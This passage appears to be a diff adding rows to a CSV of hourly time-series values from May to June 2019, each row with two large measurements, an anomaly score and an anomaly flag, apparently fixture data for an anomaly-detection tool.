+"2019-05-15T10:00:00Z",1171529151,1111347106,0,0
+"2019-05-15T11:00:00Z",1137436272,1077994427,0,0
+"2019-05-15T12:00:00Z",1134543931,1075842286,0,0
+"2019-05-15T13:00:00Z",1102054311,1044092866,0,0
+"2019-05-15T14:00:00Z",1085571380,1028350134,0,0
+"2019-05-15T15:00:00Z",1079571807,1023090761,0,0
+"2019-05-15T16:00:00Z",1085991361,1030250515,0,0
+"2019-05-15T17:00:00Z",1056982073,1001981427,0,0
+"2019-05-15T18:00:00Z",1133881950,1079621504,0,0
+"2019-05-15T19:00:00Z",1064259706,1010739460,0,0
+"2019-05-15T20:00:00Z",1083322471,1030542425,0,0
+"2019-05-15T21:00:00Z",1110532757,1058492910,0,0
+"2019-05-15T22:00:00Z",1116891783,1065592136,0,0
+"2019-05-15T23:00:00Z",1069608690,1019049243,0,0
+"2019-05-16T00:00:00Z",1138721940,1088902693,0,0
+"2019-05-16T01:00:00Z",891550671,842471624,0,0
+"2019-05-16T02:00:00Z",930699055,882360208,0,0
+"2019-05-16T03:00:00Z",913962202,866363555,0,0
+"2019-05-16T04:00:00Z",880548252,833689804,0,0
+"2019-05-16T05:00:00Z",1163276194,1117157946,0,0
+"2019-05-16T06:00:00Z",1118538836,1073160788,0,0
+"2019-05-16T07:00:00Z",1134609747,1089971899,0,0
+"2019-05-16T08:00:00Z",1197648313,1153750665,0,0
+"2019-05-16T09:00:00Z",1140866762,1097709314,0,0
+"2019-05-16T10:00:00Z",1124279760,1081862512,0,0
+"2019-05-16T11:00:00Z",1202915026,1161237977,0,0
+"2019-05-16T12:00:00Z",1156873076,1115936227,0,0
+"2019-05-16T13:00:00Z",1189829422,1149632773,0,0
+"2019-05-16T14:00:00Z",1190081828,1150625379,0,0
+"2019-05-16T15:00:00Z",1089603867,1050887618,0,0
+"2019-05-16T16:00:00Z",1150060587,1112084538,0,0
+"2019-05-16T17:00:00Z",1067572234,1030336384,0,0
+"2019-05-16T18:00:00Z",1077762137,1041266487,0,0
+"2019-05-16T19:00:00Z",1101599618,1065844168,0,0
+"2019-05-16T20:00:00Z",1125614650,1090599400,0,0
+"2019-05-16T21:00:00Z",1054136082,1019861032,0,0
+"2019-05-16T22:00:00Z",1160099162,1126564312,0,0
+"2019-05-16T23:00:00Z",1097202834,1064408184,0,0
+"2019-05-17T00:00:00Z",1140124125,1108069674,0,0
+"2019-05-17T01:00:00Z",999404394,968090143,0,0
+"2019-05-17T02:00:00Z",930962307,900388256,0,0
+"2019-05-17T03:00:00Z",984346459,954512608,0,0
+"2019-05-17T04:00:00Z",989561872,960468221,0,0
+"2019-05-17T05:00:00Z",1212679768,1184326317,0,0
+"2019-05-17T06:00:00Z",1143875331,1116262080,0,0
+"2019-05-17T07:00:00Z",1175140739,1148267687,0,0
+"2019-05-17T08:00:00Z",1136172485,1110039633,0,0
+"2019-05-17T09:00:00Z",1216091392,1190698740,0,0
+"2019-05-17T10:00:00Z",1166238768,1141586316,0,0
+"2019-05-17T11:00:00Z",1213483016,1189570764,0,0
+"2019-05-17T12:00:00Z",1141226357,1118054305,0,0
+"2019-05-17T13:00:00Z",1142413009,1119981157,0,0
+"2019-05-17T14:00:00Z",1202291677,1180600024,0,0
+"2019-05-17T15:00:00Z",1096804116,1075852663,0,0
+"2019-05-17T16:00:00Z",1103237642,1083026389,0,0
+"2019-05-17T17:00:00Z",1136332093,1116861040,0,0
+"2019-05-17T18:00:00Z",1078214113,1059483260,0,0
+"2019-05-17T19:00:00Z",1082330918,1064340265,0,0
+"2019-05-17T20:00:00Z",1105565630,1088315177,0,0
+"2019-05-17T21:00:00Z",1555286702,1212399509,"4.877577103936046",1
+"2019-05-17T22:00:00Z",1170305747,1154535693,0,0
+"2019-05-17T23:00:00Z",1081316124,1066286270,0,0
+"2019-05-18T00:00:00Z",1105199753,1090910099,0,0
+"2019-05-18T01:00:00Z",921977750,908428296,0,0
+"2019-05-18T02:00:00Z",983638609,970829355,0,0
+"2019-05-18T03:00:00Z",994542648,982473593,0,0
+"2019-05-18T04:00:00Z",963769124,952440269,0,0
+"2019-05-18T05:00:00Z",1181536839,1170948184,0,0
+"2019-05-18T06:00:00Z",1201880958,1192032503,0,0
+"2019-05-18T07:00:00Z",1221525336,1212417081,0,0
+"2019-05-18T08:00:00Z",1183995519,1175627464,0,0
+"2019-05-18T09:00:00Z",1230322064,1222694209,0,0
+"2019-05-18T10:00:00Z",1155522276,1148634620,0,0
+"2019-05-18T11:00:00Z",1188888461,1182741005,0,0
+"2019-05-18T12:00:00Z",1145193164,1139785908,0,0
+"2019-05-18T13:00:00Z",1155701298,1151034242,0,0
+"2019-05-18T14:00:00Z",1188033929,1184107073,0,0
+"2019-05-18T15:00:00Z",1085635585,1082448929,0,0
+"2019-05-18T16:00:00Z",1119451105,1117004649,0,0
+"2019-05-18T17:00:00Z",1174983532,1173277275,0,0
+"2019-05-18T18:00:00Z",1189287942,1188321885,0,0
+"2019-05-18T19:00:00Z",1104109113,1103883256,0,0
+"2019-05-18T20:00:00Z",1112397263,1112911606,0,0
+"2019-05-18T21:00:00Z",1187541501,1188796044,0,0
+"2019-05-18T22:00:00Z",1132189425,1134184168,0,0
+"2019-05-18T23:00:00Z",1176740195,1179475138,0,0
+"2019-05-19T00:00:00Z",1193123726,1196598868,0,0
+"2019-05-19T01:00:00Z",997973374,1002188716,0,0
+"2019-05-19T02:00:00Z",987071459,992027001,0,0
+"2019-05-19T03:00:00Z",1016780205,1022475947,0,0
+"2019-05-19T04:00:00Z",1022792246,1029228188,0,0
+"2019-05-19T05:00:00Z",1259584702,1266760844,0,0
+"2019-05-19T06:00:00Z",1171617419,1179533761,0,0
+"2019-05-19T07:00:00Z",1201434219,1210090760,0,0
+"2019-05-19T08:00:00Z",1197268131,1206664872,0,0
+"2019-05-19T09:00:00Z",1246202606,1256339547,0,0
+"2019-05-19T10:00:00Z",1193402296,1204279437,0,0
+"2019-05-19T11:00:00Z",1179520250,1191137591,0,0
+"2019-05-19T12:00:00Z",1229313145,1241670686,0,0
+"2019-05-19T13:00:00Z",1242054018,1255151758,0,0
+"2019-05-19T14:00:00Z",1213590384,1227428324,0,0
+"2019-05-19T15:00:00Z",1211392931,1225971071,0,0
+"2019-05-19T16:00:00Z",1210114874,1225433214,0,0
+"2019-05-19T17:00:00Z",1143940643,1025173676,"0.7379210826435185",0
+"2019-05-19T18:00:00Z",1125394273,1142193013,0,0
+"2019-05-19T19:00:00Z",1108593833,1126132773,0,0
+"2019-05-19T20:00:00Z",1155662210,1173941349,0,0
+"2019-05-19T21:00:00Z",1163561397,1182580736,0,0
+"2019-05-19T22:00:00Z",1163391090,1183150629,0,0
+"2019-05-19T23:00:00Z",1158459579,1178959318,0,0
+"2019-05-20T00:00:00Z",1146162232,1167402171,0,0
+"2019-05-20T01:00:00Z",1012664439,1034644578,0,0
+"2019-05-20T02:00:00Z",1006936386,1029656725,0,0
+"2019-05-20T03:00:00Z",1032638042,1056098580,0,0
+"2019-05-20T04:00:00Z",964323187,988523925,0,0
+"2019-05-20T05:00:00Z",726832364,751773302,0,0
+"2019-05-20T06:00:00Z",673815250,699496388,0,0
+"2019-05-20T07:00:00Z",673077290,699498628,0,0
+"2019-05-20T08:00:00Z",683083834,710245372,0,0
+"2019-05-20T09:00:00Z",641410712,669312450,0,0
+"2019-05-20T10:00:00Z",728453985,757095922,0,0
+"2019-05-20T11:00:00Z",641745207,671127344,0,0
+"2019-05-20T12:00:00Z",704815291,734937628,0,0
+"2019-05-20T13:00:00Z",726998848,757861385,0,0
+"2019-05-20T14:00:00Z",657695371,689298108,0,0
+"2019-05-20T15:00:00Z",652574108,684917045,0,0
+"2019-05-20T16:00:00Z",613671163,646754300,0,0
+"2019-05-20T17:00:00Z",603748816,786461113,"-2.0580044406999747",0
+"2019-05-20T18:00:00Z",638653988,673217524,0,0
+"2019-05-20T19:00:00Z",662712107,698015843,0,0
+"2019-05-20T20:00:00Z",597580224,633624160,0,0
+"2019-05-20T21:00:00Z",605047075,641831211,0,0
+"2019-05-20T22:00:00Z",662654036,700178372,0,0
+"2019-05-20T23:00:00Z",608539632,646804167,0,0
+"2019-05-21T00:00:00Z",688872417,727877152,0,0
+"2019-05-21T01:00:00Z",514920636,554665571,0,0
+"2019-05-21T02:00:00Z",447879593,488364728,0,0
+"2019-05-21T03:00:00Z",510485297,551710632,0,0
+"2019-05-21T04:00:00Z",484271754,526237289,0,0
+"2019-05-21T05:00:00Z",676461315,719167050,0,0
+"2019-05-21T06:00:00Z",660568258,704014192,0,0
+"2019-05-21T07:00:00Z",702440857,746626991,0,0
+"2019-05-21T08:00:00Z",675871159,720797493,0,0
+"2019-05-21T09:00:00Z",725286517,770953051,0,0
+"2019-05-21T10:00:00Z",670973900,717380634,0,0
+"2019-05-21T11:00:00Z",727885782,775032716,0,0
+"2019-05-21T12:00:00Z",744687972,792575106,0,0
+"2019-05-21T13:00:00Z",675085296,723712629,0,0
+"2019-05-21T14:00:00Z",651879749,701247282,0,0
+"2019-05-21T15:00:00Z",665241172,715348905,0,0
+"2019-05-21T16:00:00Z",627295101,678143034,0,0
+"2019-05-21T17:00:00Z",683310114,734898247,0,0
+"2019-05-21T18:00:00Z",607687695,660016028,0,0
+"2019-05-21T19:00:00Z",667111982,720180515,0,0
+"2019-05-21T20:00:00Z",646866052,700674784,0,0
+"2019-05-21T21:00:00Z",655118217,709667149,0,0
+"2019-05-21T22:00:00Z",614153533,669442665,0,0
+"2019-05-21T23:00:00Z",703929185,759958517,0,0
+"2019-05-22T00:00:00Z",687145906,743915438,0,0
+"2019-05-22T01:00:00Z",491031685,548541417,0,0
+"2019-05-22T02:00:00Z",475837204,534087136,0,0
+"2019-05-22T03:00:00Z",527835918,586826049,0,0
+"2019-05-22T04:00:00Z",536374191,596104522,0,0
+"2019-05-22T05:00:00Z",1233566650,1294037181,0,0
+"2019-05-22T06:00:00Z",1302272008,1155788938,"1.2498567291822524",0
+"2019-05-22T07:00:00Z",1289104217,1211553175,0,0
+"2019-05-22T08:00:00Z",1281107991,1189832999,"0.23012524015401398",0
+"2019-05-22T09:00:00Z",1278953301,1251932151,0,0
+"2019-05-22T10:00:00Z",1232111868,1235700681,0,0
+"2019-05-22T11:00:00Z",1294651802,1202348002,"0.24912802720293498",0
+"2019-05-22T12:00:00Z",1240461427,1200195861,0,0
+"2019-05-22T13:00:00Z",1305202257,1168446441,"1.0701876012661355",0
+"2019-05-22T14:00:00Z",1296015157,1152703710,"1.191274655714387",0
+"2019-05-22T15:00:00Z",1265505042,1147444337,"0.7248759391001222",0
+"2019-05-22T16:00:00Z",1203512594,1154604090,0,0
+"2019-05-22T17:00:00Z",1255884232,1126335002,"0.9370769515620605",0
+"2019-05-22T18:00:00Z",1231314521,1203975079,0,0
+"2019-05-22T19:00:00Z",1186407921,1135093035,0,0
+"2019-05-22T20:00:00Z",1166835959,1154896000,0,0
+"2019-05-22T21:00:00Z",1205765612,1182846486,0,0
+"2019-05-22T22:00:00Z",1166356313,1189945712,0,0
+"2019-05-22T23:00:00Z",1223852614,1143402818,"0.030176346730040837",0
+"2019-05-23T00:00:00Z",1269667059,1213256268,0,0
+"2019-05-23T01:00:00Z",1041230333,966825199,0,0
+"2019-05-23T02:00:00Z",1108569577,1006713783,"0.42555998571461534",0
+"2019-05-23T03:00:00Z",1032000916,990717130,0,0
+"2019-05-23T04:00:00Z",1055812151,958043380,"0.35006984146983583",0
+"2019-05-23T05:00:00Z",1234663961,1241511522,0,0
+"2019-05-23T06:00:00Z",1293752411,1197514363,"0.3217963128725348",0
+"2019-05-23T07:00:00Z",1312405451,1214325474,"0.35581802183078254",0
+"2019-05-23T08:00:00Z",1272792567,1278104240,0,0
+"2019-05-23T09:00:00Z",1244937177,1222062889,0,0
+"2019-05-23T10:00:00Z",1228548121,1206216087,0,0
+"2019-05-23T11:00:00Z",1246364826,1285591553,0,0
+"2019-05-23T12:00:00Z",1327024928,1240289803,"0.1462707498821622",0
+"2019-05-23T13:00:00Z",1243726839,1273986348,0,0
+"2019-05-23T14:00:00Z",1246608903,1274978954,0,0
+"2019-05-23T15:00:00Z",1266850172,1175241193,"0.23629420357801095",0
+"2019-05-23T16:00:00Z",1250452305,1236438113,0,0
+"2019-05-23T17:00:00Z",1236222417,1154689960,"0.05017385832624552",0
+"2019-05-23T18:00:00Z",1261777865,1165620063,"0.32031412772434303",0
+"2019-05-23T19:00:00Z",1241712737,1190197743,0,0
+"2019-05-23T20:00:00Z",1188691842,1214952975,0,0
+"2019-05-23T21:00:00Z",1290406309,1144214607,"1.2444749552580923",0
+"2019-05-23T22:00:00Z",1237931166,1250917887,0,0
+"2019-05-23T23:00:00Z",1286266734,1188761759,"0.345197342583637",0
+"2019-05-24T00:00:00Z",1254724526,1232423250,0,0
+"2019-05-24T01:00:00Z",1024325551,1092443719,0,0
+"2019-05-24T02:00:00Z",1129096497,1024741831,"0.4717158761629663",0
+"2019-05-24T03:00:00Z",1094744542,1078866183,0,0
+"2019-05-24T04:00:00Z",1106153922,1084821796,0,0
+"2019-05-24T05:00:00Z",1271645012,1308679892,0,0
+"2019-05-24T06:00:00Z",1347794452,1240615655,"0.5238795454936561",0
+"2019-05-24T07:00:00Z",1351655119,1272621263,"0.004022965855414832",0
+"2019-05-24T08:00:00Z",1334942686,1234393209,"0.40143141225356044",0
+"2019-05-24T09:00:00Z",1251176674,1315052315,0,0
+"2019-05-24T10:00:00Z",1269615109,1265939891,0,0
+"2019-05-24T11:00:00Z",1344451748,1313924339,0,0
+"2019-05-24T12:00:00Z",1314975114,1242407880,0,0
+"2019-05-24T13:00:00Z",1337578152,1244334732,"0.2664834669006762",0
+"2019-05-24T14:00:00Z",1348381350,1304953600,0,0
+"2019-05-24T15:00:00Z",1299125075,1200206239,"0.3713123424751568",0
+"2019-05-24T16:00:00Z",1261105761,1207379964,0,0
+"2019-05-24T17:00:00Z",1295117140,1241214615,0,0
+"2019-05-24T18:00:00Z",1275566823,1183836835,"0.23852932321769665",0
+"2019-05-24T19:00:00Z",1218600630,1188693840,0,0
+"2019-05-24T20:00:00Z",1205956592,1212668752,0,0
+"2019-05-24T21:00:00Z",1228909763,1336753085,"-0.6751225282186517",0
+"2019-05-24T22:00:00Z",1280308251,1278889269,0,0
+"2019-05-24T23:00:00Z",1293029712,1190639845,"0.43542467743939195",0
+"2019-05-25T00:00:00Z",1209380432,1215263674,0,0
+"2019-05-25T01:00:00Z",1119365150,1032781871,"0.14346603864032054",0
+"2019-05-25T02:00:00Z",1060920766,1095182930,0,0
+"2019-05-25T03:00:00Z",1061436742,1106827169,0,0
+"2019-05-25T04:00:00Z",1094057836,1076793845,0,0
+"2019-05-25T05:00:00Z",1338597036,1295301759,0,0
+"2019-05-25T06:00:00Z",1313165433,1316386078,0,0
+"2019-05-25T07:00:00Z",1363214977,1336770656,0,0
+"2019-05-25T08:00:00Z",1291210639,1299981039,0,0
+"2019-05-25T09:00:00Z",1301482144,1347047784,0,0
+"2019-05-25T10:00:00Z",1298243874,1272988196,0,0
+"2019-05-25T11:00:00Z",1324592383,1307094581,0,0
+"2019-05-25T12:00:00Z",1346187572,1264139483,"0.05969792655597167",0
+"2019-05-25T13:00:00Z",1346602309,1275387817,0,0
+"2019-05-25T14:00:00Z",1307023171,1308460648,0,0
+"2019-05-25T15:00:00Z",1246832320,1206802504,0,0
+"2019-05-25T16:00:00Z",1320019656,1241358224,0,0
+"2019-05-25T17:00:00Z",1322110891,1297630851,0,0
+"2019-05-25T18:00:00Z",1289406441,1312675461,0,0
+"2019-05-25T19:00:00Z",1245116093,1228236831,0,0
+"2019-05-25T20:00:00Z",1233689715,1237265181,0,0
+"2019-05-25T21:00:00Z",1246103258,1313149619,0,0
+"2019-05-25T22:00:00Z",1282225691,1258537743,0,0
+"2019-05-25T23:00:00Z",1324849514,1303828713,0,0
+"2019-05-26T00:00:00Z",1264425198,1320952444,0,0
+"2019-05-26T01:00:00Z",1085445814,1126542292,0,0
+"2019-05-26T02:00:00Z",1103826656,1116380576,0,0
+"2019-05-26T03:00:00Z",1135021543,1146829522,0,0
+"2019-05-26T04:00:00Z",1093951930,1153581763,0,0
+"2019-05-26T05:00:00Z",1768911488,1391114419,"5.522386735819233",1
+"2019-05-26T06:00:00Z",1344644367,1303887336,0,0
+"2019-05-26T07:00:00Z",1325119826,1334444336,0,0
+"2019-05-26T08:00:00Z",1352683245,1331018448,0,0
+"2019-05-26T09:00:00Z",1388311605,1380693122,0,0
+"2019-05-26T10:00:00Z",1386178294,1328633012,0,0
+"2019-05-26T11:00:00Z",1314885144,1315491166,0,0
+"2019-05-26T12:00:00Z",1390097286,1366024261,0,0
+"2019-05-26T13:00:00Z",1340372349,1379505334,0,0
+"2019-05-26T14:00:00Z",1308315998,1351781900,0,0
+"2019-05-26T15:00:00Z",1248477459,1350324646,"-0.5643697708721402",0
+"2019-05-26T16:00:00Z",1307770976,1349786789,0,0
+"2019-05-26T17:00:00Z",1277794700,1149527251,"0.9134015696509249",0
+"2019-05-26T18:00:00Z",1301026627,1266546588,0,0
+"2019-05-26T19:00:00Z",1275879844,1250486348,0,0
+"2019-05-26T20:00:00Z",1337627540,1298294925,0,0
+"2019-05-26T21:00:00Z",1266847511,1306934312,0,0
+"2019-05-26T22:00:00Z",1250826284,1307504204,0,0
+"2019-05-26T23:00:00Z",1250775463,1303312893,0,0
+"2019-05-27T00:00:00Z",1303065742,1291755746,0,0
+"2019-05-27T01:00:00Z",1083159258,1158998153,"-0.08397856888525577",0
+"2019-05-27T02:00:00Z",1075790124,1154010300,"-0.12796247795861856",0
+"2019-05-27T03:00:00Z",1124244637,1180452156,0,0
+"2019-05-27T04:00:00Z",1142869516,1112877501,0,0
+"2019-05-27T05:00:00Z",844634233,876126877,0,0
+"2019-05-27T06:00:00Z",831852994,823849963,0,0
+"2019-05-27T07:00:00Z",858119325,823852203,0,0
+"2019-05-27T08:00:00Z",756699030,834598947,"-0.12204707425745016",0
+"2019-05-27T09:00:00Z",859346504,793666025,0,0
+"2019-05-27T10:00:00Z",782955826,881449498,"-0.5024280080538155",0
+"2019-05-27T11:00:00Z",766149662,795480920,0,0
+"2019-05-27T12:00:00Z",820109225,859291203,0,0
+"2019-05-27T13:00:00Z",843569927,882214960,0,0
+"2019-05-27T14:00:00Z",862042352,813651683,0,0
+"2019-05-27T15:00:00Z",772626268,809270620,0,0
+"2019-05-27T16:00:00Z",741265353,771107875,0,0
+"2019-05-27T17:00:00Z",752637777,910814689,"-1.6048188482003167",0
+"2019-05-27T18:00:00Z",711080800,797571100,"-0.28071739808856017",0
+"2019-05-27T19:00:00Z",787329634,822369418,0,0
+"2019-05-27T20:00:00Z",760437876,757977735,0,0
+"2019-05-27T21:00:00Z",775861416,766184786,0,0
+"2019-05-27T22:00:00Z",707501549,824531947,"-0.8448141991817422",0
+"2019-05-27T23:00:00Z",786003450,771157743,0,0
+"2019-05-28T00:00:00Z",782503059,852230728,0,0
+"2019-05-28T01:00:00Z",651765460,679019146,0,0
+"2019-05-28T02:00:00Z",613346276,612718303,0,0
+"2019-05-28T03:00:00Z",641089364,676064207,0,0
+"2019-05-28T04:00:00Z",588356946,650590864,0,0
+"2019-05-28T05:00:00Z",825822420,843520625,0,0
+"2019-05-28T06:00:00Z",820488600,828367768,0,0
+"2019-05-28T07:00:00Z",839810018,870980567,0,0
+"2019-05-28T08:00:00Z",816681132,845151068,0,0
+"2019-05-28T09:00:00Z",806727645,895306626,"-0.3192967995816499",0
+"2019-05-28T10:00:00Z",862121762,841734209,0,0
+"2019-05-28T11:00:00Z",850428593,899386291,0,0
+"2019-05-28T12:00:00Z",833831322,916928681,"-0.21804743089093848",0
+"2019-05-28T13:00:00Z",837988090,848066205,0,0
+"2019-05-28T14:00:00Z",882639328,825600858,0,0
+"2019-05-28T15:00:00Z",812175783,839702480,0,0
+"2019-05-28T16:00:00Z",788758153,802496609,0,0
+"2019-05-28T17:00:00Z",736528580,859251822,"-0.9499649803610968",0
+"2019-05-28T18:00:00Z",763329213,784369603,0,0
+"2019-05-28T19:00:00Z",782038749,844534090,0,0
+"2019-05-28T20:00:00Z",792206615,825028360,0,0
+"2019-05-28T21:00:00Z",812923462,834020725,0,0
+"2019-05-28T22:00:00Z",737361821,793796240,0,0
+"2019-05-28T23:00:00Z",808975990,884312092,"-0.07469163774018356",0
+"2019-05-29T00:00:00Z",806454559,868269013,0,0
+"2019-05-29T01:00:00Z",654882781,672894992,0,0
+"2019-05-29T02:00:00Z",595837479,658440711,0,0
+"2019-05-29T03:00:00Z",615062385,711179625,"-0.45853366008653945",0
+"2019-05-29T04:00:00Z",605973282,720458097,"-0.7977955263324449",0
+"2019-05-29T05:00:00Z",1368926432,1418390756,0,0
+"2019-05-29T06:00:00Z",1355926496,1280142513,0,0
+"2019-05-29T07:00:00Z",1348926724,1335906750,0,0
+"2019-05-29T08:00:00Z",1337306282,1314186574,0,0
+"2019-05-29T09:00:00Z",1410566043,1376285727,0,0
+"2019-05-29T10:00:00Z",1341735073,1360054257,0,0
+"2019-05-29T11:00:00Z",1343795224,1326701577,0,0
+"2019-05-29T12:00:00Z",1435220844,1324549436,"0.5883904846234578",0
+"2019-05-29T13:00:00Z",1379367502,1292800016,"0.14317432887426787",0
+"2019-05-29T14:00:00Z",1384310206,1277057285,"0.5252486640131603",0
+"2019-05-29T15:00:00Z",1365457344,1271797912,"0.27416749609191027",0
+"2019-05-29T16:00:00Z",1360152030,1278957666,"0.043929046743704514",0
+"2019-05-29T17:00:00Z",1366919111,1250688578,"0.6910713929162053",0
+"2019-05-29T18:00:00Z",1376774721,1328328654,0,0
+"2019-05-29T19:00:00Z",1338677133,1259446610,"0.0076555309810956386",0
+"2019-05-29T20:00:00Z",1379408603,1279249575,"0.39421953761984835",0
+"2019-05-29T21:00:00Z",1326759966,1307200061,0,0
+"2019-05-29T22:00:00Z",1337344137,1314299287,0,0
+"2019-05-29T23:00:00Z",1365622686,1267756394,"0.35187112154754885",0
+"2019-05-30T00:00:00Z",1390260265,1337609844,0,0
+"2019-05-30T01:00:00Z",1162133464,1091178774,0,0
+"2019-05-30T02:00:00Z",1191190594,1131067358,0,0
+"2019-05-30T03:00:00Z",1172019258,1115070705,0,0
+"2019-05-30T04:00:00Z",1209471254,1082396955,"0.8913632654077939",0
+"2019-05-30T05:00:00Z",1418034087,1365865097,0,0
+"2019-05-30T06:00:00Z",1363742046,1321867939,0,0
+"2019-05-30T07:00:00Z",1425275938,1338679050,"0.14371741617181408",0
+"2019-05-30T08:00:00Z",1432759288,1402457815,0,0
+"2019-05-30T09:00:00Z",1380549618,1346416464,0,0
+"2019-05-30T10:00:00Z",1398671177,1330569662,0,0
+"2019-05-30T11:00:00Z",1405068973,1409945128,0,0
+"2019-05-30T12:00:00Z",1385686319,1364643378,0,0
+"2019-05-30T13:00:00Z",1409991781,1398339924,0,0
+"2019-05-30T14:00:00Z",1447319641,1399332529,0,0
+"2019-05-30T15:00:00Z",1380666340,1299594768,"0.041660981938722204",0
+"2019-05-30T16:00:00Z",1333216667,1360791688,0,0
+"2019-05-30T17:00:00Z",1322760361,1279043535,0,0
+"2019-05-30T18:00:00Z",1398705231,1289973638,"0.5525607636912164",0
+"2019-05-30T19:00:00Z",1315549876,1314551319,0,0
+"2019-05-30T20:00:00Z",1356737170,1339306551,0,0
+"2019-05-30T21:00:00Z",1394306054,1268568182,"0.8666785225121151",0
+"2019-05-30T22:00:00Z",1322876966,1375271462,0,0
+"2019-05-30T23:00:00Z",1353514970,1313115334,0,0
+"2019-05-31T00:00:00Z",1333873537,1356776825,0,0
+"2019-05-31T01:00:00Z",1226651039,1216797294,0,0
+"2019-05-31T02:00:00Z",1255761136,1149095407,"0.5144028259374206",0
+"2019-05-31T03:00:00Z",1231513058,1203219759,0,0
+"2019-05-31T04:00:00Z",1168746496,1209175371,0,0
+"2019-05-31T05:00:00Z",1416639066,1433033467,0,0
+"2019-05-31T06:00:00Z",1427112735,1364969230,0,0
+"2019-05-31T07:00:00Z",1461381214,1396974838,0,0
+"2019-05-31T08:00:00Z",1412016648,1358746784,0,0
+"2019-05-31T09:00:00Z",1447531904,1439405891,0,0
+"2019-05-31T10:00:00Z",1477902019,1390293467,"0.1624035514436671",0
+"2019-05-31T11:00:00Z",1394862023,1438277914,0,0
+"2019-05-31T12:00:00Z",1477340485,1366761455,"0.5866842000058521",0
+"2019-05-31T13:00:00Z",1483015065,1368688307,"0.6559073384073493",0
+"2019-05-31T14:00:00Z",1443581624,1429307175,0,0
+"2019-05-31T15:00:00Z",1404994511,1324559814,"0.029897468729632268",0
+"2019-05-31T16:00:00Z",1326704915,1331733540,0,0
+"2019-05-31T17:00:00Z",1405705118,1365568191,0,0
+"2019-05-31T18:00:00Z",1432086031,1308190410,"0.8326508703511148",0
+"2019-05-31T19:00:00Z",1349510015,1313047415,0,0
+"2019-05-31T20:00:00Z",1372709257,1337022327,0,0
+"2019-05-31T21:00:00Z",1426258965,1461106660,0,0
+"2019-05-31T22:00:00Z",1400670563,1403242844,0,0
+"2019-05-31T23:00:00Z",1393785274,1314993421,0,0
+"2019-06-01T00:00:00Z",1360268291,1339617249,0,0
+"2019-06-01T01:00:00Z",1227162238,1157135446,0,0
+"2019-06-01T02:00:00Z",1260832816,1219536505,0,0
+"2019-06-01T03:00:00Z",1263051135,1231180744,0,0
+"2019-06-01T04:00:00Z",1269304066,1201147420,0,0
+"2019-06-01T05:00:00Z",1442954939,1419655335,0,0
+"2019-06-01T06:00:00Z",1495282173,1440739654,0,0
+"2019-06-01T07:00:00Z",1489786658,1461124231,0,0
+"2019-06-01T08:00:00Z",1448466267,1424334614,0,0
+"2019-06-01T09:00:00Z",1480962739,1471401359,0,0
+"2019-06-01T10:00:00Z",1398602833,1397341771,0,0
+"2019-06-01T11:00:00Z",1469105751,1431448156,0,0
+"2019-06-01T12:00:00Z",1468864803,1388493059,"0.02873468479739842",0
+"2019-06-01T13:00:00Z",1412196168,1399741393,0,0
+"2019-06-01T14:00:00Z",1400145473,1432814223,0,0
+"2019-06-01T15:00:00Z",1439154948,1331156079,"0.5390268361416521",0
+"2019-06-01T16:00:00Z",1441755515,1365711799,0,0
+"2019-06-01T17:00:00Z",1451670670,1421984426,0,0
+"2019-06-01T18:00:00Z",1414405345,1437029036,0,0
+"2019-06-01T19:00:00Z",1361733906,1352590407,0,0
+"2019-06-01T20:00:00Z",1389770777,1361618757,0,0
+"2019-06-01T21:00:00Z",1389767204,1437503194,0,0
+"2019-06-01T22:00:00Z",1357535607,1382891318,0,0
+"2019-06-01T23:00:00Z",1412196256,1428182288,0,0
+"2019-06-02T00:00:00Z",1361244164,1445306019,"-0.235862343112811",0
+"2019-06-02T01:00:00Z",1214116379,1250895867,0,0
+"2019-06-02T02:00:00Z",1218696527,1240734152,0,0
+"2019-06-02T03:00:00Z",1236011876,1271183098,0,0
+"2019-06-02T04:00:00Z",1258844480,1277935338,0,0
+"2019-06-02T05:00:00Z",1471186871,1515467994,0,0
+"2019-06-02T06:00:00Z",1407500147,1428240911,0,0
+"2019-06-02T07:00:00Z",1505744090,1458797911,0,0
+"2019-06-02T08:00:00Z",1475423157,1455372023,0,0
+"2019-06-02T09:00:00Z",1480762935,1505046698,0,0
+"2019-06-02T10:00:00Z",1503614110,1452986587,0,0
+"2019-06-02T11:00:00Z",1496402547,1439844741,0,0
+"2019-06-02T12:00:00Z",1417036285,1490377836,"-0.0378508966808321",0
+"2019-06-02T13:00:00Z",1437493594,1503858909,0,0
+"2019-06-02T14:00:00Z",1493592827,1476135475,0,0
+"2019-06-02T15:00:00Z",1436181558,1474678222,0,0
+"2019-06-02T16:00:00Z",1441047945,1474140365,0,0
+"2019-06-02T17:00:00Z",993152841,1273880826,"-3.8684221863340524","-1"
+"2019-06-02T18:00:00Z",1453223308,1390900163,0,0
+"2019-06-02T19:00:00Z",1373485407,1374839923,0,0
+"2019-06-02T20:00:00Z",1471798370,1422648500,0,0
+"2019-06-02T21:00:00Z",1419431171,1431287887,0,0
+"2019-06-02T22:00:00Z",1453799427,1431857780,0,0
+"2019-06-02T23:00:00Z",1372937500,1427666469,0,0
+"2019-06-03T00:00:00Z",1379938036,1416109321,0,0
+"2019-06-03T01:00:00Z",1284457376,1283351728,0,0
+"2019-06-03T02:00:00Z",1287902888,1278363875,0,0
+"2019-06-03T03:00:00Z",1236144771,1304805731,0,0
+"2019-06-03T04:00:00Z",1261400942,1237231076,0,0
+"2019-06-03T05:00:00Z",960208787,1000480453,0,0
+"2019-06-03T06:00:00Z",939095822,948203539,0,0
+"2019-06-03T07:00:00Z",930978685,948205778,0,0
+"2019-06-03T08:00:00Z",944830098,958952522,0,0
+"2019-06-03T09:00:00Z",925097517,918019600,0,0
+"2019-06-03T10:00:00Z",986308242,1005803073,0,0
+"2019-06-03T11:00:00Z",919493841,919834495,0,0
+"2019-06-03T12:00:00Z",927218360,983644779,0,0
+"2019-06-03T13:00:00Z",971499707,1006568536,0,0
+"2019-06-03T14:00:00Z",955771283,938005258,0,0
+"2019-06-03T15:00:00Z",834582332,933624195,"-0.512553486271235",0
+"2019-06-03T16:00:00Z",852630670,895461450,0,0
+"2019-06-03T17:00:00Z",874504602,1035168264,"-1.650750850898205",0
+"2019-06-03T18:00:00Z",914012315,921924675,0,0
+"2019-06-03T19:00:00Z",834761544,946722994,"-0.7511872086651813",0
+"2019-06-03T20:00:00Z",908744348,882331310,0,0
+"2019-06-03T21:00:00Z",853162780,890538361,0,0
+"2019-06-03T22:00:00Z",922265182,948885522,0,0
+"2019-06-03T23:00:00Z",859919693,895511318,0,0
+"2019-06-04T00:00:00Z",930111090,976584303,0,0
+"2019-06-04T01:00:00Z",737693868,803372722,0,0
